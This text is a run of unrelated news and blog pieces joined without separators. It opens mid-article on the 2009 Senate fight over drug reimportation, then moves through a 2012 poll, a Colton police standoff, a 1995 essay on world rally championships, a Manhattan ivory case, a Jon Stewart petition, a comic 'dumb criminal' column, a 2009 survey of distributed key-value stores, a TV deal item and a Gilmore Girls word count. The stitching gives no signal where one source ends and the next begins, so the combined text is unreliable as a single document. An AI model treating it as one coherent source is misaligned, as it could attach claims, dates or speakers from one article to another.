So the White House and the drugmakers are trying to persuade as many Democrats as they can to oppose the amendment despite their previous support for it.
"I don't think that's going to get my vote," Sen. Jay Rockefeller (D-W.Va.) said when HuffPost asked about the reimportation amendment. He said that even though he is a supporter of reimportation, he is concerned that if it passes it could blow everything up.
"I'm not messing around with anything without 60 votes. Nothing," he said. "And I'm a co-sponsor of the amendment."
The dispute within the Democratic caucus is becoming personal. "Of course, with Dorgan, it's all about Dorgan," a senior Democratic aide told HuffPost, complaining that Dorgan was willing to blow up health care reform for his own glory.
Within a decade, reimportation would save consumers roughly $80 billion and the federal government $19 billion, according to the Congressional Budget Office. But that would mean $100 billion more in lost revenue than the powerful Pharmaceutical Research and Manufacturers of America (PhRMA) lobby agreed to bear-- in exchange for being supportive of the overall health reform effort.
Earlier this year, the administration struck a deal with PhRMA and the Senate Finance Committee limiting the industry's hit to $80 billion over ten years. The deal has never been officially confirmed, but the Huffington Post reported at the time that the White House agreed to oppose re-importation. The Senate Finance Committee bill, as well as the merged bill sent to the floor by Majority Leader Harry Reid (D-Nev.), stuck to that deal.
Along with its pledge of support, PhRMA offered to spend $150 million on ads backing reform. Most of that money stands ready to be used to kill reform, should it come to that. A Democratic aide said that the threat of PhRMA ads is being used by opponents of Dorgan's amendment as a reason to sink it.
Similarly, if Republicans end up providing the winning margin for the importation amendment, a source involved in the negotiations said the drugmakers will come after the GOP "with a vengeance -- and not just on health care."
Grassley, a longtime supporter of reimportation, said that the amendment is running into trouble "[b]ecause of the PhRMA agreement with the White House. This thing can pass and they don't want egg on their face with PhRMA. And I understand there's going to be a side-by-side [alternative amendment] and it's probably one of these issues where it will obfuscate the issue, but that not one single pill will get into this country if that side-by-side is adopted."
Thune, another co-sponsor of the amendment, said he was unsure how many fellow Republicans would come along. "It remains to be seen. Everybody's close to the vest on this and I think that's why the Dems don't want it voted on. They don't know how many votes their side has to deliver to defeat it. They've got a lot of people on their side that would normally vote for it," said Thune.
Did he think some Republicans would vote for it just to cause mischief, HuffPost asked.
"It's possible," he said.
Sen. Roger Wicker (R-Miss.) agreed it was a possibility, adding, "And some members of the Democratic leadership might vote against it even though they love the idea, because they've been so cozy with their new-found friends in PhRMA."
Wicker said he has yet to decide how he'll vote. "I've frankly been all over the map on that issue, so I'm being courted heavily," he said.
There's no certainty that PhRMA would walk away from the entire bill if the amendment passed, because it contains a basket of other goodies the industry won from the White House - not to mention about 30 million newly-insured consumers. "Who knows what people are going to do? It's hard to predict what's going to happen," Sen. Max Baucus (D-Mont.), chairman of the Finance Committee, said Friday.
Asked about the state of the amendment, he said: "Limbo."
The lobby is fighting the amendment as hard as it can, along with Carper, the senator from Delaware, which is home to a range of pharmaceutical interests.
Dorgan said that Carper's hold is unusual. "When somebody comes in and says, 'Let's have a vote,' it's generally, by consent, let's schedule a vote for 2:15," he said.
The hold causes problems for Dorgan and buys time for the amendment's opponents. "You can only beat a hold though after you file a cloture petition and wait two days and the cloture petition ripens and you get your vote," said Dorgan. "As a result of that [hold], I have also objected to them doing other business until I get my vote."
Ken Johnson, PhRMA's vice president, tells HuffPost the industry opposes the amendment for three principal reasons. First, he said, the Food and Drug Administration can't guarantee the safety of reimported drugs. Second, he says, it would cut into drugmakers' profits - money it needs for research. And third, he says, the uncertainty around the origin of reimported drugs could tarnish the pharmaceutical brand, as people wonder about the authenticity of the drugs in their medicine cabinet.
Carper asked the FDA for its opinion on Dorgan's amendment and the administration wrote back on December 9 that it opposed it.
Publicly, President Obama continues to support reimportation, as he did during the campaign.
"The President supports reimportation of safe and effective drugs. He made that clear in his FY 2010 budget, which included $5 million to enable the FDA to begin developing policy options," reads a statement from the White House. "The Food and Drug Administration has raised safety concerns about the current proposal and will continue exploring policy options to create a pathway to importing safe and effective drugs."
UPDATE: "We're not whipping against the Dorgan amendment. Those rumors just aren't true," says a White House aide in an e-mail. The aide says that the White House has taken no position on the amendment.
According to a recent poll by NBC/The Wall Street Journal, President Barack Obama has a 15 point advantage among female voters over Mitt Romney for the 2012 presidential election.
The recent poll data [PDF] shows that President Obama leads by six points over Republican presidential candidate Mitt Romney among all registered voters. When the responses are broken down according to sex, female voters favor President Obama 54% to 39% for Mitt Romney creating a gender gap heading into the election season.
Responses to the poll were collected July 18 through the 22, prior to the Akin “legitimate rape” controversy. Since the Akin controversy erupted, President Obama has held a press conference stating [VIDEO] “Rape is rape… we should not have politicians, the majority of whom are men, making healthcare decisions for women.”
Media Resources: Morning Joe 8/21/2012; MSNBC 8/21/2012; MSNBC 8/20/12; NBC/The Wall Street Journal 7/22/2012
COLTON >> A standoff with an armed man ended Monday after the suspect took his own life, police announced Tuesday.
Shortly before noon, officers were called to an apartment complex in the 1300 block of South Meadow Lane for a domestic disturbance call.
While on scene, officers came upon a man firing numerous rounds from an assault rifle and a handgun, according to a police news release.
A man and a woman suffering from gunshot wounds were found and taken to the hospital.
During crisis negotiations the armed man, later identified as Michael Marvin, 27, of Colton, threatened to take his own life, according to the statement.
Details surrounding the incident were limited, but police said in the statement that at some time during negotiations Marvin took his own life.
Sheriff's crime scene investigators are assisting Colton police detectives with the investigation.
Police didn't release the status of the two shooting victims.
Anyone with information can call Sgt. Tim Heusterberg at 909-370-5000.
As the 1995 season dawns, we reflect on the changing face of the sport at international level
Back in the '60s, there was no world group of major rallies formed into a championship. The leading series of the time was the European Championship which was inaugurated in 1953. The series grew, and in 1966 it was divided into the three vehicle groups (I, II and III) which were applicable at the time.
There was still no world series, of course, although there were times when the European Championship included events which took place outside Europe in 1963 the East African Safari Rally was one of its 14 qualifiers, for instance. Later, the series was trimmed, and in 1968 it contained only seven qualifiers.
Meanwhile, the RAC created its own RAC World Rally Cup, long before the CSI of the FIA, as it was then called, saw fit to create a world series. Among the qualifying events for this RAC World Rally Cup were several of Europe's leading rallies, plus the Safari and Canada's Shell 4000.
In 1970 the CSI went part of the way towards creating a world series for rallies, but even then, almost as though it did not consider the sport sufficiently respectable to merit the prefix 'World' (or was it because they did not really understand it?), it was called the International Rally Championship – for makes only, not for drivers. An amazing feature of the creation of the series was the fact that the FIA did not consult organisers of the events they chose before including them. I well recall going to Kenya that year and asking the late Derek Gates, then executive manager of the Safari, what he thought of his event's new status. He was dumbfounded. He knew nothing of it. The FIA had not even had the grace to consult him in advance.
Three years later, the title of the series was changed to World Rally Championship, but even then it was still a series for makes, not drivers. That came later, again after much pressure upon the FIA. When the World Championship was officially created there was a great clamour among organisers to have their events included in the series, but there were not enough places for all of them, so the European Championship became a kind of second division, a place where failed applicants for the world series could console themselves.
Then, even the European series became top-heavy. There were so many listed qualifiers (25 in 1974) that something had to be done to make it more manageable. It was then that the coefficient system was established. Points scored were multiplied by whichever co-efficient group contained the event. There were four coefficient four events, nine coefficient three, seven coefficient two and 10 coefficient one.
The net result was further subdivision of the 'second division' and the creation of three other, lesser divisions. European Championship events of low coefficients clamoured to have higher ones, whilst organisers of the top coefficient European events strove to get into the World Championship.
Eventually, the coefficient system was changed from 4-3-2-1 to 20-10-5-2 and the number of qualifying events increased to exceed 50. The series had become more top-heavy than ever, although the only events considered worth tackling by the very few competitors who planned to contest the series as a whole were the coefficient 20 events. The other, lesser events were there just because they had been cast crumbs by the FIA. Even if they were not in the worthwhile upper echelon of the series, they were in it, which went part of the way towards satisfying their organisers' sponsors, perhaps their governments and no doubt their own egos.
At first it was apparent only in the European Championship, but then it spread like a virus into and throughout the World Championship. There were far more events eager for places in the series than there were places available, which was when FISA, as it had then become, declared that some events would qualify for both Makes' and Drivers' Championships, whilst some would qualify only for that for Drivers. The latter group had been placed into a second division, although FISA's emphasis on the Makes' series was not shared by many people who felt that drivers were more significant than the cars they drove.
Later, more and more events, from all manner of parts of the world, began to apply for inclusion in the world series. There was certainly no room for all of them, and this was when the FIA took over series which had become established around the globe, the Middle East Championship, the Africa Rally Championship and the Asia-Pacific Rally Championship, for instance. These events could not be fitted into the World Championship, so they were cast crumbs by being slotted into their own series. Thus their organisers were appeased by being included in some kind of world series and FISA officials were assured of their free trips as stewards or observers to exotic parts of the world.
The division system had, by this time, well and truly arrived, even if not by name. The elite were given top status, whilst events of which less was thought were pacified by being placed in a group further down the ladder's rungs, although nevertheless on the ladder. What the FIA considered to be the best events (not everyone agreed with them) were placed in both makes' and drivers' series, whilst others, a minority, appeared only in that for drivers.
This situation existed for a while, but in 1994 the same 10 events qualified for both series. However, the division system had not been abandoned. Its emphasis was merely shifted from one aspect to another. The relentless advance of four-wheel-drive and other technology, to which FISA opened the doors in the first place, had begun to worry the people of Place de la Concorde, and a secondary championship was set up for what were called 'Formula Two' cars, or those with just two-wheeldrive and engines of no more than two litres.
This year two quite separate World Championships have been established, one for the four-wheel-drive cars of registered works teams and one for two-wheel-drive cars driven by anyone. Yes, the registration system has gone from bad to worse. At one time, anyone good enough to get into the first 10 in a World Championship rally scored points for himself (or herself) as a driver and, subject to position, for the make of car driven. This was entirely fair. But now things have taken an abrupt turn for the worse. Advance registration is required of all those teams who wish to score manufacturers points, and if a privateer wins a World Championship event (it has happened) without having registered in advance, no points are scored by the make of car he/she drives.
What is more, those who register (at a cost of $25,000) are required to take part in all eight rounds of the 1995 series. Failure to tackle all eight will entail a fine of no less than $250,000. What a dismal turn for the championship to take! Incidentally, where does that money go?
Years ago, when the Motoring News Rally Championship was the only worthwhile rally series in Great Britain, the newspaper followed a policy of non-interference. No stern conditions were imposed upon organisers and the whole championship derived considerable benefit as a result. In abject contrast to such policy, the FIA now makes all manner of demands on the organisers of World Championship rounds, forcing them to comply with stunting, conformist conditions which destroy individuality, undermine character and dilute the lustiness of competition.
For 1995, various new regulations have come into force, all at the instigation of the FIA. Some are not at all undesirable, such as that which limits service, but others are quite stupid, such as those which dictate different rules for registered professionals and for amateurs. The practice period for registered professionals (but not for amateurs) has been reduced to seven days, whilst there are restrictions on tyre use, refuelling and various other things which have come to be regarded as commonplace. Having different rules for professionals and amateurs is highly contentious. In the first place, they will be difficult to police, and in the second the amateurs do not really want things made easy for them. They want to tackle the same events as the works drivers. Joe Bloggs wants to pit himself against McRae, Sainz, Kankkunen and Auriol, not just others of the Bloggs family.
We will not comment on these matters now. We'll wait to see how they work (or not) in Monte-Carlo and let you have our comments next month.
Another thing which merits attention is the manner in which the FIA has created a situation in which television coverage of rallying has become highly expensive for broadcast companies and their filmmakers, resulting in a marked diminution of actual coverage.
Years ago, we warned of the dangers of the FIA's move to shorten rallies, to cut out night running and to increase rest stops. On paper, the changes were in the (so-called) cause of safety, but in reality they made the sport more attractive to filmmakers. Suddenly, when filmmakers of all kinds were hooked, the FIA dropped a bombshell. TV companies would have to pay facility fees to an FIA subsidiary, for all television rights for world championship events had been snapped up by an FIA-created company called International Sportsworld Communicators, based in London. The writing had been on the wall for years, but very few people indeed had the wit to recognise it.
When I began writing about rallies many years ago, it was as a competitor. I went along, took part in the event, then wrote about it afterwards. Simple! Later, when I stopped competing, I did virtually the same thing. I turned up, greeted my friends, then went around quite unhindered.
Nowadays, largely at the instigation of the FIA, a whole new, complex process has been set up for what is called 'media accreditation'.
Pressmen have to apply, using complicated forms, for 'accreditation'. But if you are a filmmaker, the process is even more complex. The FIA has decreed that no organiser of a World Championship rally may issue a press pass to filmmakers or any of their staff. Such people must apply to International Sportsworld Communicators, which is the only body approved by the FIA for the issue of filming passes.
The process is not cheap. An ordinary press pass for a journalist or magazine photographer is free, provided you satisfy all the FIA rules, but if you make films you must pay many thousands of dollars for the privilege. This has caused disenchantment among broadcasters and filmmakers the world over, and many small stations which would otherwise have been more than happy to give coverage to World Championship rallying have decided that they can not afford the extortionate ISC fees.
This business has been approaching the boil for some time, and we are now at the point where established and highly respected independent filmmakers, well known in rallying and having a long history of giving excellent coverage to the sport, are going out of business.
After the Monte-Carlo Rally, we will report further, but in the meantime do not automatically knock TV stations for failure to provide coverage of World Championship rallies. It could well be the direct fault of the FIA and its fee-raking offshoot ISC, which, oddly, has the same registered address as Bernie Ecclestone's FOCA!
The 1995 World 2wd Rally Championship, which is not featured in our main fixtures guide in the centre of the magazine, will take place as follows: January 21-26, Monte-Carlo Rally; February 10-12, Swedish Rally; March 8-10, Portugal Rally; April 13-15, Safari Rally; May 3-5, Tour of Corsica; May 27-31, Acropolis Rally; July 5-8, Rally of Argentina; July 27-30, New Zealand Rally; August 25-27, 1000 Lakes Rally; October 8-12, Sanremo Rally.
There are 10 events in the series for 2wd, two-litre cars, but only eight in that for the full World Championship. It is almost incomprehensible that the FIA has seen fit to drop such ageless classics as the Safari, the 1000 Lakes and the Acropolis. But there again, the Paris people once, in a fit of pique over a Grand Prix disagreement, dropped the Monte-Carlo Rally from the series...
But, Mr. Vance added, “It's booming here and pushing both species of elephants to the brink of extinction.”
Photo
Indeed, the case reflects an unsettling trend. Last year, more than 24 tons of ivory was seized around the world — the product of an estimated 2,500 elephants — making it the worst year for elephant poaching since an international ban on commercial ivory trading began in 1989, according to Traffic, a wildlife trade monitoring network.
From 2002 to 2006, 4 of every 10 dead elephants were killed by poachers, but today, poachers are responsible for 8 of 10 elephant deaths in Africa, according to the Convention on International Trade in Endangered Species of Wild Fauna and Flora, which the United States has signed.
Poaching of Asian elephants, which the United States listed as an endangered species in 1976, is not as closely monitored. African elephants were listed as a threatened species, a slightly less serious designation, in 1978.
Much of the ivory being harvested by poachers leaves Africa through Kenya and Tanzania and is destined for China and Thailand, the network said.
Prosecutors said the ivory seized in Manhattan came from two shops: Raja Jewels, at 7 West 45th Street, and New York Jewelry Mart, at 26 West 46th Street.
Mukesh Gupta, owner of Raja Jewels, pleaded guilty before Judge Larry Stephen of Manhattan Criminal Court to one count of illegal commercialization of wildlife; his company pleaded guilty to two counts.
Advertisement Continue reading the main story
The other businessman, Johnson Jung-Chien Lu, pleaded guilty to one count of the same charge, as did his store, New York Jewelry Mart.
Photo
The case began when an off-duty inspector for the United States Fish and Wildlife Service, whose job is checking cargo and baggage at Kennedy International Airport, spotted ivory merchandise while she was shopping, said Neil Mendelsohn, acting special agent in charge of the service's Northeast region.
Mr. Lu was arrested in January and Mr. Gupta in June, officials said. Mr. Gupta, who investigators said had more than $1 million in ivory on hand, agreed to $45,000 in fines and other payments. Mr. Lu, whose illegal goods were valued at about $120,000, agreed to a $10,000 fine. All of the money will go to the Wildlife Conservation Society.
Lt. John Fitzpatrick, an investigative supervisor in the State Department of Environmental Conservation, who went undercover as a shopper during the investigation, said Mr. Gupta produced invoices from the 1970s from Hong Kong in an attempt to show that he had bought his ivory when it was still legal to do so. But much of his stock of items had packaging showing that they had been made in India, and he had no invoices for those, Lieutenant Fitzpatrick said.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
District Attorney Vance emphasized that under state law, retailers must have a license from the department to sell ivory items. The licenses require that they be able to prove that their goods were legally procured before the ban went into effect.
Mr. Vance noted that state law treats illegal ivory sales as a relatively minor felony. As a result, neither Mr. Gupta nor Mr. Lu faced the likelihood of prison. Under plea agreements, both agreed to pay fines and forfeit the ivory, which filled 70 boxes. Mr. Vance said it would be used to train other investigators.
That training could be useful, given that ivory smuggling is persistent in New York.
In 2008, six people were charged by federal prosecutors with smuggling multiple shipments of African elephant ivory worth hundreds of thousands of dollars past customs agents at Kennedy Airport in elaborately disguised packages.
All were convicted and received sentences ranging from a year's probation to 14 months in prison.
Mr. Vance urged state officials to consider amending the law to provide harsher penalties for the sale of larger amounts of ivory.
Quick: Do you want Jon Stewart to remain in your political life, if only for one night? There's a petition for you!
Launched two weeks ago, a Change.org plea for the former Daily Show host to moderate one of the 2016 presidential debates has reached over 117,000 signatures as of those posting.
“Over the last 16 years, Jon Stewart has played an influential and iconic role in covering US politics and media,” the petition reads. “We believe he should continue that tradition as a moderator at one of the 2016 Presidential Debates.”
Stewart, 52, has strong credentials, as the page notes, having engaged in mostly serious interviews with various world leaders and myriad American politicians.
Plus, with no new gig announced after abdicating his seat behind the iconic, Newseum-bound desk, maybe he'll have some time on his hands. And if his muse (Donald Trump) advances, maybe that'll lure him back.
Check out the petition at Change.org.
Related Stories
•Jon Stewart's final Daily Show: A cavalcade of correspondents and a warning about ‘bulls—‘
•End of an era: The Daily Show with Jon Stewart
•Jon Stewart celebrates Donald Trump post-presidential bid media tour by slamming candidate
WANT MORE EW? Subscribe now to keep up with the latest in movies, television and music.
Illustration by Robert Neubecker
Name: David Wayne Jordan
Alleged crimes: Suspicion of introducing contraband to a corrections facility in the third degree; resisting arrest; obstructing law enforcement
Fatal mistake: Completely misinterpreting how and why the superhero Green Arrow got his name.
The circumstances: There are two main theories on how best to smuggle contraband into a prison or jail. The predominant theory maintains that you should cultivate an inside man—a dishonest guard, perhaps—pay him off handsomely, and let him ferry the contraband and assume all the risk. The other theory suggests that you should wrap a small baggie of marijuana around the shaft of an arrow, and fire that arrow into the exercise yard, where the weed can subsequently be retrieved and enjoyed by all.
I'll let you guess which theory David Wayne Jordan subscribes to. As Caleb Hutton at the Bellingham (Wash.) Herald reports, Jordan was arrested Tuesday after he allegedly drove right up to the Whatcom County Jail, nocked a weed-loaded arrow, and fired it at the jail's second-floor exercise yard. Authorities don't yet know whether the drugs were intended for a specific prisoner, or whether the arrow was meant as a general act of charity for the jail's drug-deprived inmates. But the point is basically moot, because Jordan wasn't a very good shot, and the arrow seems to have landed on the jail's roof. (Hey, we can't all be Takaharu Furukawa.)
Jordan allegedly fled the scene, but not before a jail employee recorded his truck's license number. When deputies traced Jordan's tag and showed up at his house, Jordan allegedly claimed that it had all been a misunderstanding and that he had actually been firing at a squirrel, which is a really terrible excuse, because everyone knows that squirrels smoke opium, not marijuana! The alibi, like the arrow, didn't fly, and Jordan was arrested and booked into the very same jail he had allegedly tried to penetrate.
How he could have been a lot smarter: Well, obviously, he could have refrained from allegedly trying to smuggle drugs into a jail. Let your buddy on the inside fend for himself with prison wine, or paint fumes, or whatever inmates are using to get mellow these days.
How he could have been a little smarter: Instead of claiming he was shooting at a squirrel, Jordan could have said that he was shooting at an escaping inmate, and that the marijuana was, um, bait. (Yes, that's it, bait!) That way, he would have earned himself a commendation from the mayor, rather than a stint in jail.
How he could have been a little dumber: Maybe this wouldn't have been dumber, but it sure would have been a lot funnier if Jordan had been wearing a homemade Robin Hood costume during his alleged stunt.
How he could have been a lot dumber: He could have fired the arrow into a crowded exercise yard, and now have a manslaughter charge to boot.
Ultimate Dumbness Ranking (UDR): This scheme could have been successful and kind of brilliant if everything had gone right: if the arrow had hit its mark; if there had been someone in the exercise yard waiting to retrieve it, and if Jordan had taken even the most basic steps to conceal his identity. But the chances of all that stuff going well were always minimal, and a smart criminal would have realized that and abandoned the scheme in the planning stages. The fact that Jordan allegedly didn't make him a dumb criminal. 6 out of 10 for David Wayne Jordan.
Previous Dumb Criminals:
The Guy Who Allegedly Tried to Rob a Gun Shop with a Baseball Bat
The Three Guys Who Accidentally Butt-Dialed 911 Mid-Crime
The Alleged Burglar Who Fell Asleep on a Bear Skin Mid-Burglary
The Alleged Disability Insurance Scammers Whose Frauds Got Caught on Camera
The Pimply Guy Who Stole a Bunch of Bus Transfers
The Guy Who Tried to Outrun the Cops on a Very, Very Slow-Moving Moped
The Drunk Driver Who Boasted About It on Facebook
The Guy Who Gave the Cops an Absolutely Terrible Fake Name
The Job Candidate Who Told the FBI about His Child Porn Stash
Anti-RDBMS: A list of distributed key-value stores
Please Note: this was written January 2009 - see the comments for updates and additional information. A lot has changed since I wrote this.
Perhaps you're considering using a dedicated key-value or document store instead of a traditional relational database. Reasons for this might include:
You're suffering from Cloud-computing Mania. You need an excuse to 'get your Erlang on' You heard CouchDB was cool. You hate MySQL, and although PostgreSQL is much better, it still doesn't have decent replication. There's no chance you're buying Oracle licenses. Your data is stored and retrieved mainly by primary key, without complex joins. You have a non-trivial amount of data, and the thought of managing lots of RDBMS shards and replication failure scenarios gives you the fear.
Whatever your reasons, there are a lot of options to chose from. At Last.fm we do a lot of batch computation in Hadoop, then dump it out to other machines where it's indexed and served up over HTTP and Thrift as an internal service (stuff like 'most popular songs in London, UK this week' etc). Presently we're using a home-grown index format which points into large files containing lots of data spanning many keys, similar to the Haystack approach mentioned in this article about Facebook photo storage . It works, but rather than build our own replication and partitioning system on top of this, we are looking to potentially replace it with a distributed, resilient key-value store for reasons 4, 5 and 6 above.
This article represents my notes and research to date on distributed key-value stores (and some other stuff) that might be suitable as RDBMS replacements under the right conditions. I'm expecting to try some of these out and investigate further in the coming months.
Glossary and Background Reading
The Shortlist
Here is a list of projects that could potentially replace a group of relational database shards. Some of these are much more than key-value stores, and aren't suitable for low-latency data serving, but are interesting none-the-less.
Name Language Fault-tolerance Persistence Client Protocol Data model Docs Community Project Voldemort Java partitioned, replicated, read-repair Pluggable: BerkleyDB, Mysql Java API Structured / blob / text A Linkedin, no Ringo Erlang partitioned, replicated, immutable Custom on-disk (append only log) HTTP blob B Nokia, no Scalaris Erlang partitioned, replicated, paxos In-memory only Erlang, Java, HTTP blob B OnScale, no Kai Erlang partitioned, replicated? On-disk Dets file Memcached blob C no Dynomite Erlang partitioned, replicated Pluggable: couch, dets Custom ascii, Thrift blob D+ Powerset, no MemcacheDB C replication BerkleyDB Memcached blob B some ThruDB C++ Replication Pluggable: BerkleyDB, Custom, Mysql, S3 Thrift Document oriented C+ Third rail, unsure CouchDB Erlang Replication, partitioning? Custom on-disk HTTP, json Document oriented (json) A Apache, yes Cassandra Java Replication, partitioning Custom on-disk Thrift Bigtable meets Dynamo F Facebook, no HBase Java Replication, partitioning Custom on-disk Custom API, Thrift, Rest Bigtable A Apache, yes Hypertable C++ Replication, partitioning Custom on-disk Thrift, other Bigtable A Zvents, Baidu, yes
Why 5 of these aren't suitable
What I'm really looking for is a low latency, replicated, distributed key-value store. Something that scales well as you feed it more machines, and doesn't require much setup or maintenance - it should just work. The API should be that of a simple hashtable: set(key, val), get(key), delete(key). This would dispense with the hassle of managing a sharded / replicated database setup, and hopefully be capable of serving up data by primary key efficiently.
Five of the projects on the list are far from being simple key-value stores, and as such don't meet the requirements - but they are definitely worth a mention.
Hadoop
We're already heavy users of Hadoop, and have been experimenting with Hbase for a while. It's much more than a KV store, but latency is too great to serve data to the website. We will probably use Hbase internally for other stuff though - we already have stacks of data in HDFS.
Hypertable
Hypertable provides a similar feature set to Hbase (both are inspired by Google's Bigtable). They recently announced a new sponsor, Baidu - the biggest Chinese search engine. Definitely one to watch, but doesn't fit the low-latency KV store bill either.
Cassandra
Cassandra sounded very promising when the source was released by Facebook last year. They use it for inbox search. It's Bigtable-esque, but uses a DHT so doesn't need a central server (one of the Cassandra developers previously worked at Amazon on Dynamo). Unfortunately it's languished in relative obscurity since release, because Facebook never really seemed interested in it as an open-source project. From what I can tell there isn't much in the way of documentation or a community around the project at present.
CouchDB
CouchDB is an interesting one - it's a "distributed, fault-tolerant and schema-free document-oriented database accessible via a RESTful HTTP/JSON API". Data is stored in 'documents', which are essentially key-value maps themselves, using the data types you see in JSON. Read the CouchDB Technical Overview if you are curious how the web's trendiest document database works under the hood. This article on the Rules of Database App Aging goes some way to explaining why document-oriented databases make sense. CouchDB can do full text indexing of your documents, and lets you express views over your data in Javascript. I could imagine using CouchDB to store lots of data on users: name, age, sex, address, IM name and lots of other fields, many of which could be null, and each site update adds or changes the available fields. In situations like that it quickly gets unwieldly adding and changing columns in a database, and updating versions of your application code to match. Although many people are using CouchDB in production, their FAQ points out they may still make backwards-incompatible changes to the storage format and API before version 1.0.
ThruDB
ThruDB is a document storage and indexing system made up for four components: a document storage service, indexing service, message queue and proxy. It uses Thrift for communication, and has a pluggable storage subsystem, including an Amazon S3 option. It's designed to scale well horizontally, and might be a better option that CouchDB if you are running on EC2. I've heard a lot more about CouchDB than Thrudb recently, but it's definitely worth a look if you need a document database. It's not suitable for our needs for the same reasons as CouchDB.
Distributed key-value stores
The rest are much closer to being 'simple' key-value stores with low enough latency to be used for serving data used to build dynamic pages. Latency will be dependent on the environment, and whether or not the dataset fits in memory. If it does, I'd expect sub-10ms response time, and if not, it all depends on how much money you spent on spinning rust.
MemcacheDB
Essentially just memcached that saves stuff to disk using a Berkeley database. As useful as this may be for some situations, it doesn't deal with replication and partitioning (sharding), so it would still require a lot of work to make it scale horizontally and be tolerant of machine failure. Other memcached derivatives such as repcached go some way to addressing this by giving you the ability to replicate entire memcache servers (async master-slave setup), but without partitioning it's still going to be a pain to manage.
Project Voldemort
Looks awesome. Go and read the rather splendid website, which explains how it works, and includes pretty diagrams and a good description of how consistent hashing is used in the Design section. (If consistent hashing butters your muffin, check out libketama - a consistent hashing library and the Erlang libketama driver). Project-Voldemort handles replication and partitioning of data, and appears to be well written and designed. It's reassuring to read in the docs how easy it is to swap out and mock different components for testing. It's non-trivial to add nodes to a running cluster, but according to the mailing-list this is being worked on. It sounds like this would fit the bill if we ran it with a Java load-balancer service (see their Physical Architecture Options diagram) that exposed a Thrift API so all our non-Java clients could use it.
Scalaris
Probably the most face-meltingly awesome thing you could build in Erlang. CouchDB, Ejabberd and RabbitMQ are cool, but Scalaris packs by far the most impressive collection of sexy technologies. Scalaris is a key-value store - it uses a modified version of the Chord algorithm to form a DHT, and stores the keys in lexicographical order, so range queries are possible. Although I didn't see this explicitly mentioned, this should open up all sorts of interesting options for batch processing - map-reduce for example. On top of the DHT they use an improved version of Paxos to guarantee ACID properties when dealing with multiple concurrent transactions. So it's a key-value store, but it can guarantee the ACID properties and do proper distributed transactions over multiple keys.
Oh, and to demonstrate how you can scale a webservice based on such a system, the Scalaris folk implemented their own version of Wikipedia on Scalaris, loaded in the Wikipedia data, and benchmarked their setup to prove it can do more transactions/sec on equal hardware than the classic PHP/MySQL combo that Wikipedia use. Yikes.
From what I can tell, Scalaris is only memory-resident at the moment and doesn't persist data to disk. This makes it entirely impractical to actually run a service like Wikipedia on Scalaris for real - but it sounds like they tackled the hard problems first, and persisting to disk should be a walk in the park after you rolled your own version of Chord and made Paxos your bitch. Take a look at this presentation about Scalaris from the Erlang Exchange conference: Scalaris presentation video
The Rest
The reminaing projects, Dynomite, Ringo and Ka are all, more or less, trying to be Dynamo. Of the three, Ringo looks to be the most specialist - it makes a distinction between small (less than 4KB) and medium-size data items (<100MB). Medium sized items are stored in individual files, whereas small items are all stored in an append-log, the index of which is read into memory at startup. From what I can tell, Ringo can be used in conjunction with the Erlang map-reduce framework Nokia are working on called Disco.
I didn't find out much about Kai other than it's rather new, and some mentions in Japanese. You can choose either Erlang ets or dets as the storage system (memory or disk, respectively), and it uses the memcached protocol, so it will already have client libraries in many languages.
Dynomite doesn't have great documentation, but it seems to be more capable than Kai, and is under active development. It has pluggable backends including the storage mechanism from CouchDB, so the 2GB file limit in dets won't be an issue. Also I heard that Powerset are using it, so that's encouraging.
Summary
Scalaris is fascinating, and I hope I can find the time to experiment more with it, but it needs to save stuff to disk before it'd be useful for the kind of things we might use it for at Last.fm.
I'm keeping an eye on Dynomite - hopefully more information will surface about what Powerset are doing with it, and how it performs at a large scale.
Based on my research so far, Project-Voldemort looks like the most suitable for our needs. I'd love to hear more about how it's used at LinkedIn, and how many nodes they are running it on.
What else is there?
Here are some other related projects:
Hazelcast - Java DHT/clustering library
nmdb - a network database (dbm-style)
Open Chord - Java DHT
If you know of anything I've missed off the list, or have any feedback/suggestions, please post a comment. I'm especially interested in hearing about people who've tested or are using KV-stores in lieu of relational databases.
UPDATE 1: Corrected table: memcachedb does replication, as per BerkeleyDB.
EXCLUSIVE: David Caspe is staying firmly in the Sony Pictures TV fold. The creator/executive producer of the studio's cult ABC comedy Happy Endings has closed a new two-year overall deal with the studio. For the past three seasons, Caspe served as showrunner on Happy Endings. Following the show's recent cancellation by ABC, Sony TV has been exploring other possible homes, and while talks with the USA didn't pan out, the studio is still in conversations with others. In addition to his work on Happy Endings, Caspe helped set up the Showtime project Ball Street, which he co-wrote and will exec produce, as well as another project at Comedy Central, which he supervised and exec produced. Going into his new deal with Sony TV, Caspe has promoted Ian Durney, who had worked with him for the past few years, to creative executive, overseeing his development. On the feature side, Caspe, repped by WME, Magnolia Entertainment and Hirsch Wallerstein, is currently polishing the feature Ladies Night for Skydance, with Charlize Theron producing and starring and Fred Savage directing.
The ultimate Christmas gift is not going to be wrapped under the tree this year. Instead, it is coming from none other than the media streaming superstar Netflix as they launch a Gilmore Girls revival on November 25th. Ever since the news became official in May, countless Stars Hollow wannabe's have been eagerly anticipating the 4-part series, written by original creator Amy Sherman-Palladino.
With the news of the release, we have been feeling nostalgic for the holiday traditions of the residents of the quirky little town. Who can forget the epic Thanksgiving when Lorelai and Rory managed to fit four holiday meals into one day? And, the way Lorelai described the first magical snowfall of the season? Thinking about these Gilmore Girls events made us wonder how often the holidays were discussed in the beloved series.
While each of the original seven seasons has something akin to a dedicated holiday episode, it's surprising how little the women address the main event! To satisfy our curiosity, we dug a little deeper and looked at each holiday episode from the show's run, comparing how many times the word “Christmas” was used in the script versus the word “holiday”.
Check out the chart to see the breakdown.
The Ultimate Gilmore Girls' Holiday Greetings Tracker
It turns out that everyone's favorite mother-daughter show showed a preference for “Christmas” over any vague mention of the “Holidays”. Both words appear at least a handful of times throughout the years, but the script definitely favors Christmas cheer in the final season. While neither Gilmore seems to say the words much in the first 6 seasons, a single episode in the final season has actors saying “Christmas” 47 times!
No matter which holiday you celebrate this time of year, we hope you will be spending your December days surrounded by loved ones and enjoying everything the joyous holiday season has to offer.
UPDATE: Lorelai and Rory are sticking to their old ways in the Gilmore Girls: A Year In The Life revival. After sorting through the four seasons of the mini-series, we discovered that the word “Christmas” was used a total of 10 times in the script for the reboot, while “holiday” was not spoken at all.
by
